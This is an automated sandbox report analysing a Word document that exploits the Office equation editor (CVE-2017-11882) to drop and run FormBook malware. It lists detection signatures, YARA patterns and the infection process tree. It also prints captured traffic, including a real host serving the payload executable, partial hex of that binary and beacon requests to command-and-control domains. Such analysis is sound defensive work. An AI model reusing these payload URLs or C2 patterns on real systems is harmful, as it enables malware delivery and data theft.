Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report VOMAXTRADING.doc

Overview

General Information

Sample Name:VOMAXTRADING.doc
Analysis ID:323039
MD5:30244581b41accd77dab936571e0d87e
SHA1:46ddb3fa250dfb4808c3a43f7846d7c643a4f325
SHA256:2664162d0341d8e5cf1cf3a290b77406d87111e3c9ff3fcf3a4f0836d15d3afe
Tags:doc

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 1776 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • EQNEDT32.EXE (PID: 2372 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • skypound83892.exe (PID: 1520 cmdline: C:\Users\user\AppData\Roaming\skypound83892.exe MD5: EF8FC92D8B47C1F40DD5233AA9B3F260)
      • skypound83892.exe (PID: 960 cmdline: C:\Users\user\AppData\Roaming\skypound83892.exe MD5: EF8FC92D8B47C1F40DD5233AA9B3F260)
        • explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • firefos.exe (PID: 2992 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe' MD5: EF8FC92D8B47C1F40DD5233AA9B3F260)
            • firefos.exe (PID: 2336 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe MD5: EF8FC92D8B47C1F40DD5233AA9B3F260)
          • firefos.exe (PID: 2872 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe' MD5: EF8FC92D8B47C1F40DD5233AA9B3F260)
            • firefos.exe (PID: 2840 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe MD5: EF8FC92D8B47C1F40DD5233AA9B3F260)
          • NAPSTAT.EXE (PID: 2016 cmdline: C:\Windows\SysWOW64\NAPSTAT.EXE MD5: 4AF92E1821D96E4178732FC04D8FD69C)
            • cmd.exe (PID: 172 cmdline: /c del 'C:\Users\user\AppData\Roaming\skypound83892.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • EQNEDT32.EXE (PID: 2804 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000C.00000002.2389941869.0000000000330000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000C.00000002.2389941869.0000000000330000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000C.00000002.2389941869.0000000000330000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166b9:$sqlite3step: 68 34 1C 7B E1
    • 0x167cc:$sqlite3step: 68 34 1C 7B E1
    • 0x166e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1680d:$sqlite3text: 68 38 2A 90 C5
    • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
    0000000F.00000002.2233553109.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000000F.00000002.2233553109.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      16.2.firefos.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        16.2.firefos.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        16.2.firefos.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158b9:$sqlite3step: 68 34 1C 7B E1
        • 0x159cc:$sqlite3step: 68 34 1C 7B E1
        • 0x158e8:$sqlite3text: 68 38 2A 90 C5
        • 0x15a0d:$sqlite3text: 68 38 2A 90 C5
        • 0x158fb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
        15.2.firefos.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          15.2.firefos.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
          Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\user\AppData\Roaming\skypound83892.exe, CommandLine: C:\Users\user\AppData\Roaming\skypound83892.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\skypound83892.exe, NewProcessName: C:\Users\user\AppData\Roaming\skypound83892.exe, OriginalFileName: C:\Users\user\AppData\Roaming\skypound83892.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2372, ProcessCommandLine: C:\Users\user\AppData\Roaming\skypound83892.exe, ProcessId: 1520
          Sigma detected: EQNEDT32.EXE connecting to internetShow sources
          Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 104.168.198.45, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2372, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
          Sigma detected: File Dropped By EQNEDT32EXEShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2372, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\skypoundx[1].exe

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Multi AV Scanner detection for submitted fileShow sources
          Source: VOMAXTRADING.docVirustotal: Detection: 43%Perma Link
          Source: VOMAXTRADING.docReversingLabs: Detection: 39%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000C.00000002.2389941869.0000000000330000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.2233553109.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.2389745948.0000000000120000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.2389888753.0000000000280000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.2299563843.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2203096098.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2203049931.0000000000330000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2203016993.0000000000300000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 16.2.firefos.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.firefos.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.firefos.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 16.2.firefos.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.skypound83892.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.skypound83892.exe.400000.1.unpack, type: UNPACKEDPE
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\skypoundx[1].exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeJoe Sandbox ML: detected
          Source: 15.2.firefos.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 16.2.firefos.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 6.2.skypound83892.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Exploits:

          barindex
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\skypound83892.exeJump to behavior
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeFile opened: C:\Users\user\AppData\Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeFile opened: C:\Users\user\Jump to behavior
          Source: global trafficDNS query: name: sea-shared-5.masterns.com
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.168.198.45:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.168.198.45:80

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.22:49170
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 26 Nov 2020 07:44:06 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveLast-Modified: Thu, 26 Nov 2020 01:10:37 GMTAccept-Ranges: bytesContent-Length: 278528Vary: Accept-EncodingKeep-Alive: timeout=5, max=10000Content-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5c ff be 5f 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 f2 03 00 00 4c 00 00 00 00 00 00 be 10 04 00 00 20 00 00 00 20 04 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 04 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 10 04 00 57 00 00 00 00 20 04 00 38 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 f0 03 00 00 20 00 00 00 f2 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 38 49 00 00 00 20 04 00 00 4a 00 00 00 f4 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 04 00 00 02 00 00 00 3e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 10 04 00 00 00 00 00 48 00 00 00 02 00 05 00 6c ed 03 00 f8 22 00 00 03 00 00 00 43 00 00 06 e8 30 00 00 84 bc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 17 1e 2d 08 26 28 13 00 00 0a 2b 03 26 2b f6 2a 00 00 00 03 30 09 00 1d 00 00 00 00 00 00 00 73 01 00 00 06 28 14 00 00 0a 74 02 00 00 02 1e 2d 03 26 2b 07 80 01 00 00 04 2b 00 2a 00 00 00 1a 7e 01 00 00 04 2a 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 16 1d 2d 08 26 28 15 00 00 0a 2b 03 26 2b f6 2a 00 00 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 19 1b 2d 08 26 28 15 00 00 0a 2b 03 26 2b f6 2a 00 00 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 1a 1b 2d 08 26 28 15 00 00 0a 2b 03 26 2b f6 2a 00 00 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 1e 17 2d 08 26 28 15 00 00 0a 2b 03 26 2b f6 2a 00 00 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 1d 18 2d 08 26 28 15 00 00 0a 2b 03 26 2b f6 2a 00 00 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 1e 1a 2d 08 26 28 15 00 00 0a 2b 03 26 2b f6 2a 00 00 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 18 17 2d 08 26 28 15 00 00 0a 2b 03 26
          Source: global trafficHTTP traffic detected: GET /bu43/?OBZPd=k6AhchXHBB&Yzrx=UiBHsTvAEQLKMdFr/hj1g9PdhtcWl8ZZ/ysXuG6Tr8ng0KhPmhT7mwdkGkewJ6JbNyjYEA== HTTP/1.1Host: www.opel-occasions-ales.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bu43/?Yzrx=5vpVtqJ3i14TYLjahre3JpaYS6Wcf4IPAkG7pj5paeEEzi6lwzUZWwRsk9qYR19+9CpDRA==&OBZPd=k6AhchXHBB HTTP/1.1Host: www.runwithit.mediaConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bu43/?OBZPd=k6AhchXHBB&Yzrx=5Lfh6qcZO6QCpL41ah3mk8LUL3OJ/OZx9c26bzra2u0GgF5XtbJN8WKHQCrI7u2LEBkhnA== HTTP/1.1Host: www.mycapecrusade.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 198.49.23.141 198.49.23.141
          Source: Joe Sandbox ViewASN Name: HOSTWINDSUS HOSTWINDSUS
          Source: Joe Sandbox ViewASN Name: GOOGLEUS GOOGLEUS
          Source: global trafficHTTP traffic detected: GET /~vhlcnlog/ugopoundx/skypoundx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: sea-shared-5.masterns.comConnection: Keep-Alive
          Source: C:\Windows\explorer.exeCode function: 7_2_02933302 getaddrinfo,setsockopt,recv,7_2_02933302
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B65885D3-1CF8-4E74-AA78-05F4F57053A0}.tmpJump to behavior
          Source: global trafficHTTP traffic detected: GET /~vhlcnlog/ugopoundx/skypoundx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: sea-shared-5.masterns.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /bu43/?OBZPd=k6AhchXHBB&Yzrx=UiBHsTvAEQLKMdFr/hj1g9PdhtcWl8ZZ/ysXuG6Tr8ng0KhPmhT7mwdkGkewJ6JbNyjYEA== HTTP/1.1Host: www.opel-occasions-ales.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bu43/?Yzrx=5vpVtqJ3i14TYLjahre3JpaYS6Wcf4IPAkG7pj5paeEEzi6lwzUZWwRsk9qYR19+9CpDRA==&OBZPd=k6AhchXHBB HTTP/1.1Host: www.runwithit.mediaConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bu43/?OBZPd=k6AhchXHBB&Yzrx=5Lfh6qcZO6QCpL41ah3mk8LUL3OJ/OZx9c26bzra2u0GgF5XtbJN8WKHQCrI7u2LEBkhnA== HTTP/1.1Host: www.mycapecrusade.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
          Source: explorer.exe, 00000007.00000000.2144811362.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: unknownDNS traffic detected: queries for: sea-shared-5.masterns.com
          Source: explorer.exe, 00000007.00000000.2189757519.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://%s.com
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://amazon.fr/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://auone.jp/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189757519.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://auto.search.msn.com/response.asp?MT=
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://br.search.yahoo.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.estadao.com.br/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.orange.es/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.lycos.es/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com.br/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.es/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ozu.es/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ya.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busqueda.aol.com.mx/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cerca.lycos.it/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
